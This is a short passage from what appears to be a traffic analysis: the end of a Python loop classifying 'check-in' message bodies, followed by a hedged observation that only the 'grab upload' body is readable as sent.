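    for n, head, printable in classify_checkins(CHECKIN_BODIES):
        print("check-in: %d bytes, starts %s, printable=%s" % (n, head, printable))
```

The grab upload is the only body that is readable as sent; the check-in bodies all decode to binary with bytes 2 through 4 zero, which is an observation about these four samples only and not a claim about the format.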
